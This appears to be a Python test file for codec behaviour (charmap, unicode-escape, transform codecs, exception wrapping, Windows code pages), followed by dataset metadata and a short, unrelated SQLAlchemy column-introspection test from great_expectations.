# This used to crash, we are only verifying there's no crash.
table_type = type(cp1140.encoding_table)
self.assertEqual(table_type, table_type)
def test_decoder_state(self):
# Check that getstate() and setstate() handle the state properly
u = "abc123"
for encoding in all_unicode_encodings:
if encoding not in broken_incremental_coders:
self.check_state_handling_decode(encoding, u, u.encode(encoding))
self.check_state_handling_encode(encoding, u, u.encode(encoding))
@yp_unittest.skip_str_codecs
class CharmapTest(yp_unittest.TestCase):
def test_decode_with_string_map(self):
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict", "abc"),
("abc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict", "\U0010FFFFbc"),
("\U0010FFFFbc", 3)
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab"
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab\ufffe"
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab"),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab\ufffe"),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab"),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab\ufffe"),
("ab", 3)
)
allbytes = bytes(range(256))
self.assertEqual(
codecs.charmap_decode(allbytes, "ignore", ""),
("", len(allbytes))
)
def test_decode_with_int2str_map(self):
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: 'c'}),
("abc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'Aa', 1: 'Bb', 2: 'Cc'}),
("AaBbCc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: '\U0010FFFF', 1: 'b', 2: 'c'}),
("\U0010FFFFbc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: ''}),
("ab", 3)
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b'}
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: None}
)
# Issue #14850
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: '\ufffe'}
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b'}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b', 2: None}),
("ab\ufffd", 3)
)
# Issue #14850
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b', 2: '\ufffe'}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b'}),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b', 2: None}),
("ab", 3)
)
# Issue #14850
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b', 2: '\ufffe'}),
("ab", 3)
)
allbytes = bytes(range(256))
self.assertEqual(
codecs.charmap_decode(allbytes, "ignore", {}),
("", len(allbytes))
)
def test_decode_with_int2int_map(self):
a = ord('a')
b = ord('b')
c = ord('c')
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: a, 1: b, 2: c}),
("abc", 3)
)
# Issue #15379
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 0x10FFFF, 1: b, 2: c}),
("\U0010FFFFbc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: sys.maxunicode, 1: b, 2: c}),
(chr(sys.maxunicode) + "bc", 3)
)
self.assertRaises(TypeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: sys.maxunicode + 1, 1: b, 2: c}
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: a, 1: b},
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: a, 1: b, 2: 0xFFFE},
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: a, 1: b}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: a, 1: b, 2: 0xFFFE}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: a, 1: b}),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: a, 1: b, 2: 0xFFFE}),
("ab", 3)
)
@yp_unittest.skip_str_codecs
class WithStmtTest(yp_unittest.TestCase):
def test_encodedfile(self):
f = io.BytesIO(b"\xc3\xbc")
with codecs.EncodedFile(f, "latin-1", "utf-8") as ef:
self.assertEqual(ef.read(), b"\xfc")
def test_streamreaderwriter(self):
f = io.BytesIO(b"\xc3\xbc")
info = codecs.lookup("utf-8")
with codecs.StreamReaderWriter(f, info.streamreader,
info.streamwriter, 'strict') as srw:
self.assertEqual(srw.read(), "\xfc")
@yp_unittest.skip_str_codecs
class TypesTest(yp_unittest.TestCase):
def test_decode_unicode(self):
# Most decoders don't accept unicode input
decoders = [
codecs.utf_7_decode,
codecs.utf_8_decode,
codecs.utf_16_le_decode,
codecs.utf_16_be_decode,
codecs.utf_16_ex_decode,
codecs.utf_32_decode,
codecs.utf_32_le_decode,
codecs.utf_32_be_decode,
codecs.utf_32_ex_decode,
codecs.latin_1_decode,
codecs.ascii_decode,
codecs.charmap_decode,
]
if hasattr(codecs, "mbcs_decode"):
decoders.append(codecs.mbcs_decode)
for decoder in decoders:
self.assertRaises(TypeError, decoder, "xxx")
def test_unicode_escape(self):
# Escape-decoding an unicode string is supported ang gives the same
# result as decoding the equivalent ASCII bytes string.
self.assertEqual(codecs.unicode_escape_decode(r"\u1234"), ("\u1234", 6))
self.assertEqual(codecs.unicode_escape_decode(br"\u1234"), ("\u1234", 6))
self.assertEqual(codecs.raw_unicode_escape_decode(r"\u1234"), ("\u1234", 6))
self.assertEqual(codecs.raw_unicode_escape_decode(br"\u1234"), ("\u1234", 6))
self.assertRaises(UnicodeDecodeError, codecs.unicode_escape_decode, br"\U00110000")
self.assertEqual(codecs.unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
self.assertRaises(UnicodeDecodeError, codecs.raw_unicode_escape_decode, br"\U00110000")
self.assertEqual(codecs.raw_unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class UnicodeEscapeTest(yp_unittest.TestCase):
def test_empty(self):
self.assertEqual(codecs.unicode_escape_encode(""), (b"", 0))
self.assertEqual(codecs.unicode_escape_decode(b""), ("", 0))
def test_raw_encode(self):
encode = codecs.unicode_escape_encode
for b in range(32, 127):
if b != b'\\'[0]:
self.assertEqual(encode(chr(b)), (bytes([b]), 1))
def test_raw_decode(self):
decode = codecs.unicode_escape_decode
for b in range(256):
if b != b'\\'[0]:
self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))
def test_escape_encode(self):
encode = codecs.unicode_escape_encode
check = coding_checker(self, encode)
check('\t', br'\t')
check('\n', br'\n')
check('\r', br'\r')
check('\\', br'\\')
for b in range(32):
if chr(b) not in '\t\n\r':
check(chr(b), ('\\x%02x' % b).encode())
for b in range(127, 256):
check(chr(b), ('\\x%02x' % b).encode())
check('\u20ac', br'\u20ac')
check('\U0001d120', br'\U0001d120')
def test_escape_decode(self):
decode = codecs.unicode_escape_decode
check = coding_checker(self, decode)
check(b"[\\\n]", "[]")
check(br'[\"]', '["]')
check(br"[\']", "[']")
check(br"[\\]", "[\\]")
check(br"[\a]", "[\x07]")
check(br"[\b]", "[\x08]")
check(br"[\t]", "[\x09]")
check(br"[\n]", "[\x0a]")
check(br"[\v]", "[\x0b]")
check(br"[\f]", "[\x0c]")
check(br"[\r]", "[\x0d]")
check(br"[\7]", "[\x07]")
check(br"[\8]", r"[\8]")
check(br"[\78]", "[\x078]")
check(br"[\41]", "[!]")
check(br"[\418]", "[!8]")
check(br"[\101]", "[A]")
check(br"[\1010]", "[A0]")
check(br"[\x41]", "[A]")
check(br"[\x410]", "[A0]")
check(br"\u20ac", "\u20ac")
check(br"\U0001d120", "\U0001d120")
for b in range(256):
if b not in b'\n"\'\\abtnvfr01234567xuUN':
check(b'\\' + bytes([b]), '\\' + chr(b))
def test_decode_errors(self):
decode = codecs.unicode_escape_decode
for c, d in (b'x', 2), (b'u', 4), (b'U', 4):
for i in range(d):
self.assertRaises(UnicodeDecodeError, decode,
b"\\" + c + b"0"*i)
self.assertRaises(UnicodeDecodeError, decode,
b"[\\" + c + b"0"*i + b"]")
data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
self.assertEqual(decode(data, "replace"),
("[\ufffd]\ufffd", len(data)))
self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class RawUnicodeEscapeTest(yp_unittest.TestCase):
def test_empty(self):
self.assertEqual(codecs.raw_unicode_escape_encode(""), (b"", 0))
self.assertEqual(codecs.raw_unicode_escape_decode(b""), ("", 0))
def test_raw_encode(self):
encode = codecs.raw_unicode_escape_encode
for b in range(256):
self.assertEqual(encode(chr(b)), (bytes([b]), 1))
def test_raw_decode(self):
decode = codecs.raw_unicode_escape_decode
for b in range(256):
self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))
def test_escape_encode(self):
encode = codecs.raw_unicode_escape_encode
check = coding_checker(self, encode)
for b in range(256):
if b not in b'uU':
check('\\' + chr(b), b'\\' + bytes([b]))
check('\u20ac', br'\u20ac')
check('\U0001d120', br'\U0001d120')
def test_escape_decode(self):
decode = codecs.raw_unicode_escape_decode
check = coding_checker(self, decode)
for b in range(256):
if b not in b'uU':
check(b'\\' + bytes([b]), '\\' + chr(b))
check(br"\u20ac", "\u20ac")
check(br"\U0001d120", "\U0001d120")
def test_decode_errors(self):
decode = codecs.raw_unicode_escape_decode
for c, d in (b'u', 4), (b'U', 4):
for i in range(d):
self.assertRaises(UnicodeDecodeError, decode,
b"\\" + c + b"0"*i)
self.assertRaises(UnicodeDecodeError, decode,
b"[\\" + c + b"0"*i + b"]")
data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
self.assertEqual(decode(data, "replace"),
("[\ufffd]\ufffd", len(data)))
self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class SurrogateEscapeTest(yp_unittest.TestCase):
def test_utf8(self):
self.assertEqual(b"foo\x80bar".decode("utf-8", "surrogateescape"),
"foo\udc80bar")
self.assertEqual("foo\udc80bar".encode("utf-8", "surrogateescape"),
b"foo\x80bar")
self.assertEqual(b"\xed\xb0\x80".decode("utf-8", "surrogateescape"),
"\udced\udcb0\udc80")
self.assertEqual("\udced\udcb0\udc80".encode("utf-8", "surrogateescape"),
b"\xed\xb0\x80")
def test_ascii(self):
self.assertEqual(b"foo\x80bar".decode("ascii", "surrogateescape"),
"foo\udc80bar")
self.assertEqual("foo\udc80bar".encode("ascii", "surrogateescape"),
b"foo\x80bar")
def test_charmap(self):
self.assertEqual(b"foo\xa5bar".decode("iso-8859-3", "surrogateescape"),
"foo\udca5bar")
self.assertEqual("foo\udca5bar".encode("iso-8859-3", "surrogateescape"),
b"foo\xa5bar")
def test_latin1(self):
self.assertEqual("\udce4\udceb\udcef\udcf6\udcfc".encode("latin-1", "surrogateescape"),
b"\xe4\xeb\xef\xf6\xfc")
@yp_unittest.skip_str_codecs
class BomTest(yp_unittest.TestCase):
def test_seek0(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
self.addCleanup(support.unlink, support.TESTFN)
for encoding in tests:
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.write(data[0])
self.assertNotEqual(f.tell(), 0)
f.seek(0)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data)
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.writer.write(data[0])
self.assertNotEqual(f.writer.tell(), 0)
f.writer.seek(0)
f.writer.write(data)
f.seek(0)
self.assertEqual(f.read(), data)
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.write(data)
f.seek(f.tell())
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.writer.write(data)
f.writer.seek(f.writer.tell())
f.writer.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
bytes_transform_encodings = [
"base64_codec",
"uu_codec",
"quopri_codec",
"hex_codec",
]
transform_aliases = {
"base64_codec": ["base64", "base_64"],
"uu_codec": ["uu"],
"quopri_codec": ["quopri", "quoted_printable", "quotedprintable"],
"hex_codec": ["hex"],
"rot_13": ["rot13"],
}
try:
import zlib
except ImportError:
zlib = None
else:
bytes_transform_encodings.append("zlib_codec")
transform_aliases["zlib_codec"] = ["zip", "zlib"]
try:
import bz2
except ImportError:
pass
else:
bytes_transform_encodings.append("bz2_codec")
transform_aliases["bz2_codec"] = ["bz2"]
@yp_unittest.skip_str_codecs
class TransformCodecTest(yp_unittest.TestCase):
def test_basics(self):
binput = bytes(range(256))
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
(o, size) = codecs.getencoder(encoding)(binput)
self.assertEqual(size, len(binput))
(i, size) = codecs.getdecoder(encoding)(o)
self.assertEqual(size, len(o))
self.assertEqual(i, binput)
def test_read(self):
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
sin = codecs.encode(b"\x80", encoding)
reader = codecs.getreader(encoding)(io.BytesIO(sin))
sout = reader.read()
self.assertEqual(sout, b"\x80")
def test_readline(self):
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
sin = codecs.encode(b"\x80", encoding)
reader = codecs.getreader(encoding)(io.BytesIO(sin))
sout = reader.readline()
self.assertEqual(sout, b"\x80")
def test_buffer_api_usage(self):
original = b"12345\x80"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
data = original
view = memoryview(data)
data = codecs.encode(data, encoding)
view_encoded = codecs.encode(view, encoding)
self.assertEqual(view_encoded, data)
view = memoryview(data)
data = codecs.decode(data, encoding)
self.assertEqual(data, original)
view_decoded = codecs.decode(view, encoding)
self.assertEqual(view_decoded, data)
def test_text_to_binary_blacklists_binary_transforms(self):
bad_input = "bad input type"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
fmt = ( "{!r} is not a text encoding; "
"use codecs.encode\(\) to handle arbitrary codecs")
msg = fmt.format(encoding)
with self.assertRaisesRegex(LookupError, msg) as failure:
bad_input.encode(encoding)
self.assertIsNone(failure.exception.__cause__)
def test_text_to_binary_blacklists_text_transforms(self):
msg = (r"^'rot_13' is not a text encoding; "
"use codecs.encode\(\) to handle arbitrary codecs")
with self.assertRaisesRegex(LookupError, msg):
"just an example message".encode("rot_13")
def test_binary_to_text_blacklists_binary_transforms(self):
data = b"encode first to ensure we meet any format restrictions"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
encoded_data = codecs.encode(data, encoding)
fmt = (r"{!r} is not a text encoding; "
"use codecs.decode\(\) to handle arbitrary codecs")
msg = fmt.format(encoding)
with self.assertRaisesRegex(LookupError, msg):
encoded_data.decode(encoding)
with self.assertRaisesRegex(LookupError, msg):
bytearray(encoded_data).decode(encoding)
def test_binary_to_text_blacklists_text_transforms(self):
for bad_input in (b"immutable", bytearray(b"mutable")):
with self.subTest(bad_input=bad_input):
msg = (r"^'rot_13' is not a text encoding; "
"use codecs.decode\(\) to handle arbitrary codecs")
with self.assertRaisesRegex(LookupError, msg) as failure:
bad_input.decode("rot_13")
self.assertIsNone(failure.exception.__cause__)
@yp_unittest.skipUnless(zlib, "Requires zlib support")
def test_custom_zlib_error_is_wrapped(self):
msg = "^decoding with 'zlib_codec' codec failed"
with self.assertRaisesRegex(Exception, msg) as failure:
codecs.decode(b"hello", "zlib_codec")
self.assertIsInstance(failure.exception.__cause__,
type(failure.exception))
def test_custom_hex_error_is_wrapped(self):
msg = "^decoding with 'hex_codec' codec failed"
with self.assertRaisesRegex(Exception, msg) as failure:
codecs.decode(b"hello", "hex_codec")
self.assertIsInstance(failure.exception.__cause__,
type(failure.exception))
# Ensure codec aliases from http://bugs.python.org/issue7475 work
def test_aliases(self):
for codec_name, aliases in transform_aliases.items():
expected_name = codecs.lookup(codec_name).name
for alias in aliases:
with self.subTest(alias=alias):
info = codecs.lookup(alias)
self.assertEqual(info.name, expected_name)
def test_uu_invalid(self):
# Missing "begin" line
self.assertRaises(ValueError, codecs.decode, b"", "uu-codec")
# The codec system tries to wrap exceptions in order to ensure the error
# mentions the operation being performed and the codec involved. We
# currently *only* want this to happen for relatively stateless
# exceptions, where the only significant information they contain is their
# type and a single str argument.
# Use a local codec registry to avoid appearing to leak objects when
# registering multiple seach functions
_TEST_CODECS = {}
def _get_test_codec(codec_name):
return _TEST_CODECS.get(codec_name)
codecs.register(_get_test_codec) # Returns None, not usable as a decorator
try:
# Issue #22166: Also need to clear the internal cache in CPython
from _codecs import _forget_codec
except ImportError:
def _forget_codec(codec_name):
pass
@yp_unittest.skip_str_codecs
class ExceptionChainingTest(yp_unittest.TestCase):
def setUp(self):
# There's no way to unregister a codec search function, so we just
# appear to be formally documented...
# We also make sure we use a truly unique id for the custom codec
# to avoid issues with the codec cache when running these tests
# multiple times (e.g. when hunting for refleaks)
unique_id = repr(self) + str(id(self))
self.codec_name = encodings.normalize_encoding(unique_id).lower()
# We store the object to raise on the instance because of a bad
# interaction between the codec caching (which means we can't
self.obj_to_raise = RuntimeError
def tearDown(self):
_TEST_CODECS.pop(self.codec_name, None)
try:
_forget_codec(self.codec_name)
except KeyError:
pass
def set_codec(self, encode, decode):
codec_info = codecs.CodecInfo(encode, decode,
name=self.codec_name)
_TEST_CODECS[self.codec_name] = codec_info
@contextlib.contextmanager
def assertWrapped(self, operation, exc_type, msg):
full_msg = r"{} with {!r} codec failed \({}: {}\)".format(
operation, self.codec_name, exc_type.__name__, msg)
with self.assertRaisesRegex(exc_type, full_msg) as caught:
yield caught
self.assertIsInstance(caught.exception.__cause__, exc_type)
self.assertIsNotNone(caught.exception.__cause__.__traceback__)
def raise_obj(self, *args, **kwds):
raise self.obj_to_raise
def check_wrapped(self, obj_to_raise, msg, exc_type=RuntimeError):
self.obj_to_raise = obj_to_raise
self.set_codec(self.raise_obj, self.raise_obj)
with self.assertWrapped("encoding", exc_type, msg):
"str_input".encode(self.codec_name)
with self.assertWrapped("encoding", exc_type, msg):
codecs.encode("str_input", self.codec_name)
with self.assertWrapped("decoding", exc_type, msg):
b"bytes input".decode(self.codec_name)
with self.assertWrapped("decoding", exc_type, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_raise_by_type(self):
self.check_wrapped(RuntimeError, "")
def test_raise_by_value(self):
msg = "This should be wrapped"
self.check_wrapped(RuntimeError(msg), msg)
def test_raise_grandchild_subclass_exact_size(self):
msg = "This should be wrapped"
class MyRuntimeError(RuntimeError):
__slots__ = ()
self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
def test_raise_subclass_with_weakref_support(self):
msg = "This should be wrapped"
class MyRuntimeError(RuntimeError):
pass
self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
def check_not_wrapped(self, obj_to_raise, msg):
def raise_obj(*args, **kwds):
raise obj_to_raise
self.set_codec(raise_obj, raise_obj)
with self.assertRaisesRegex(RuntimeError, msg):
"str input".encode(self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
codecs.encode("str input", self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
b"bytes input".decode(self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_init_override_is_not_wrapped(self):
class CustomInit(RuntimeError):
def __init__(self):
pass
self.check_not_wrapped(CustomInit, "")
def test_new_override_is_not_wrapped(self):
class CustomNew(RuntimeError):
def __new__(cls):
return super().__new__(cls)
self.check_not_wrapped(CustomNew, "")
def test_instance_attribute_is_not_wrapped(self):
msg = "This should NOT be wrapped"
exc = RuntimeError(msg)
exc.attr = 1
self.check_not_wrapped(exc, "^{}$".format(msg))
def test_non_str_arg_is_not_wrapped(self):
self.check_not_wrapped(RuntimeError(1), "1")
def test_multiple_args_is_not_wrapped(self):
msg_re = r"^\('a', 'b', 'c'\)$"
self.check_not_wrapped(RuntimeError('a', 'b', 'c'), msg_re)
def test_codec_lookup_failure_not_wrapped(self):
msg = "^unknown encoding: {}$".format(self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
"str input".encode(self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
codecs.encode("str input", self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
b"bytes input".decode(self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_unflagged_non_text_codec_handling(self):
# pre-emptively skipped by the text model related methods
# However, third party codecs won't be flagged, so we still make
def encode_to_str(*args, **kwds):
return "not bytes!", 0
def decode_to_bytes(*args, **kwds):
return b"not str!", 0
self.set_codec(encode_to_str, decode_to_bytes)
encoded = codecs.encode(None, self.codec_name)
self.assertEqual(encoded, "not bytes!")
decoded = codecs.decode(None, self.codec_name)
self.assertEqual(decoded, b"not str!")
fmt = (r"^{!r} encoder returned 'str' instead of 'bytes'; "
"use codecs.encode\(\) to encode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
"str_input".encode(self.codec_name)
fmt = (r"^{!r} decoder returned 'bytes' instead of 'str'; "
"use codecs.decode\(\) to decode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
b"bytes input".decode(self.codec_name)
@yp_unittest.skipUnless(sys.platform == 'win32',
'code pages are specific to Windows')
@yp_unittest.skip_str_codecs
class CodePageTest(yp_unittest.TestCase):
CP_UTF8 = 65001
def test_invalid_code_page(self):
self.assertRaises(ValueError, codecs.code_page_encode, -1, 'a')
self.assertRaises(ValueError, codecs.code_page_decode, -1, b'a')
self.assertRaises(OSError, codecs.code_page_encode, 123, 'a')
self.assertRaises(OSError, codecs.code_page_decode, 123, b'a')
def test_code_page_name(self):
self.assertRaisesRegex(UnicodeEncodeError, 'cp932',
codecs.code_page_encode, 932, '\xff')
self.assertRaisesRegex(UnicodeDecodeError, 'cp932',
codecs.code_page_decode, 932, b'\x81\x00')
self.assertRaisesRegex(UnicodeDecodeError, 'CP_UTF8',
codecs.code_page_decode, self.CP_UTF8, b'\xff')
def check_decode(self, cp, tests):
for raw, errors, expected in tests:
if expected is not None:
try:
decoded = codecs.code_page_decode(cp, raw, errors)
except UnicodeDecodeError as err:
self.fail('Unable to decode %a from "cp%s" with '
'errors=%r: %s' % (raw, cp, errors, err))
self.assertEqual(decoded[0], expected,
'%a.decode("cp%s", %r)=%a != %a'
% (raw, cp, errors, decoded[0], expected))
self.assertGreaterEqual(decoded[1], 0)
self.assertLessEqual(decoded[1], len(raw))
else:
self.assertRaises(UnicodeDecodeError,
codecs.code_page_decode, cp, raw, errors)
def check_encode(self, cp, tests):
for text, errors, expected in tests:
if expected is not None:
try:
encoded = codecs.code_page_encode(cp, text, errors)
except UnicodeEncodeError as err:
self.fail('Unable to encode %a to "cp%s" with '
'errors=%r: %s' % (text, cp, errors, err))
self.assertEqual(encoded[0], expected,
'%a.encode("cp%s", %r)=%a != %a'
% (text, cp, errors, encoded[0], expected))
self.assertEqual(encoded[1], len(text))
else:
self.assertRaises(UnicodeEncodeError,
codecs.code_page_encode, cp, text, errors)
def test_cp932(self):
self.check_encode(932, (
('abc', 'strict', b'abc'),
('\uff44\u9a3e', 'strict', b'\x82\x84\xe9\x80'),
('\xff', 'strict', None),
('[\xff]', 'ignore', b'[]'),
('[\xff]', 'replace', b'[y]'),
('[\u20ac]', 'replace', b'[?]'),
('[\xff]', 'backslashreplace', b'[\\xff]'),
('[\xff]', 'xmlcharrefreplace', b'[ÿ]'),
))
self.check_decode(932, (
(b'abc', 'strict', 'abc'),
(b'\x82\x84\xe9\x80', 'strict', '\uff44\u9a3e'),
(b'[\xff]', 'strict', None),
(b'[\xff]', 'ignore', '[]'),
(b'[\xff]', 'replace', '[\ufffd]'),
(b'[\xff]', 'surrogateescape', '[\udcff]'),
(b'\x81\x00abc', 'strict', None),
(b'\x81\x00abc', 'ignore', '\x00abc'),
(b'\x81\x00abc', 'replace', '\ufffd\x00abc'),
))
def test_cp1252(self):
self.check_encode(1252, (
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'\xe9\x80'),
('\xff', 'strict', b'\xff'),
('\u0141', 'strict', None),
('\u0141', 'ignore', b''),
('\u0141', 'replace', b'L'),
))
self.check_decode(1252, (
(b'abc', 'strict', 'abc'),
(b'\xe9\x80', 'strict', '\xe9\u20ac'),
(b'\xff', 'strict', '\xff'),
))
def test_cp_utf7(self):
cp = 65000
self.check_encode(cp, (
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'+AOkgrA-'),
('\U0010ffff', 'strict', b'+2//f/w-'),
('\udc80', 'strict', b'+3IA-'),
('\ufffd', 'strict', b'+//0-'),
))
self.check_decode(cp, (
(b'abc', 'strict', 'abc'),
(b'+AOkgrA-', 'strict', '\xe9\u20ac'),
(b'+2//f/w-', 'strict', '\U0010ffff'),
(b'+3IA-', 'strict', '\udc80'),
(b'+//0-', 'strict', '\ufffd'),
(b'[+/]', 'strict', '[]'),
(b'[\xff]', 'strict', '[\xff]'),
))
def test_multibyte_encoding(self):
self.check_decode(932, (
(b'\x84\xe9\x80', 'ignore', '\u9a3e'),
(b'\x84\xe9\x80', 'replace', '\ufffd\u9a3e'),
))
self.check_decode(self.CP_UTF8, (
(b'\xff\xf4\x8f\xbf\xbf', 'ignore', '\U0010ffff'),
(b'\xff\xf4\x8f\xbf\xbf', 'replace', '\ufffd\U0010ffff'),
))
if VISTA_OR_LATER:
self.check_encode(self.CP_UTF8, (
('[\U0010ffff\uDC80]', 'ignore', b'[\xf4\x8f\xbf\xbf]'),
('[\U0010ffff\uDC80]', 'replace', b'[\xf4\x8f\xbf\xbf?]'),
))
def test_incremental(self):
decoded = codecs.code_page_decode(932, b'\x82', 'strict', False)
self.assertEqual(decoded, ('', 0))
decoded = codecs.code_page_decode(932,
b'\xe9\x80\xe9', 'strict',
False)
self.assertEqual(decoded, ('\u9a3e', 2))
decoded = codecs.code_page_decode(932,
b'\xe9\x80\xe9\x80', 'strict',
False)
self.assertEqual(decoded, ('\u9a3e\u9a3e', 4))
decoded = codecs.code_page_decode(932,
b'abc', 'strict',
False)
self.assertEqual(decoded, ('abc', 3))
if __name__ == "__main__":
yp_unittest.main()
| true | true |
f7fa316c85f6113e64369e1a1203eb7ce7ba6486 | 1,298 | py | Python | tests/expectations/metrics/test_table_column_types.py | OmriBromberg/great_expectations | 60eb81ebfb08fef5d37d55c316dc962928beb165 | [
"Apache-2.0"
] | 1 | 2021-04-11T20:54:23.000Z | 2021-04-11T20:54:23.000Z | tests/expectations/metrics/test_table_column_types.py | OmriBromberg/great_expectations | 60eb81ebfb08fef5d37d55c316dc962928beb165 | [
"Apache-2.0"
] | 53 | 2021-10-02T02:26:51.000Z | 2021-12-28T20:49:25.000Z | tests/expectations/metrics/test_table_column_types.py | OmriBromberg/great_expectations | 60eb81ebfb08fef5d37d55c316dc962928beb165 | [
"Apache-2.0"
] | 1 | 2022-03-03T16:47:32.000Z | 2022-03-03T16:47:32.000Z | from great_expectations.data_context.util import file_relative_path
from great_expectations.execution_engine import SqlAlchemyExecutionEngine
from great_expectations.execution_engine.sqlalchemy_batch_data import (
SqlAlchemyBatchData,
)
from great_expectations.expectations.metrics.import_manager import reflection
from great_expectations.util import get_sqlalchemy_inspector
def test_table_column_introspection(sa):
db_file = file_relative_path(
__file__,
"../../test_sets/test_cases_for_sql_data_connector.db",
)
eng = sa.create_engine(f"sqlite:///{db_file}")
engine = SqlAlchemyExecutionEngine(engine=eng)
batch_data = SqlAlchemyBatchData(
execution_engine=engine, table_name="table_partitioned_by_date_column__A"
)
engine.load_batch_data("__", batch_data)
assert isinstance(batch_data.selectable, sa.Table)
assert batch_data.selectable.name == "table_partitioned_by_date_column__A"
assert batch_data.selectable.schema is None
insp = get_sqlalchemy_inspector(eng)
columns = insp.get_columns(
batch_data.selectable.name, schema=batch_data.selectable.schema
)
assert [x["name"] for x in columns] == [
"index",
"id",
"date",
"event_type",
"favorite_color",
]
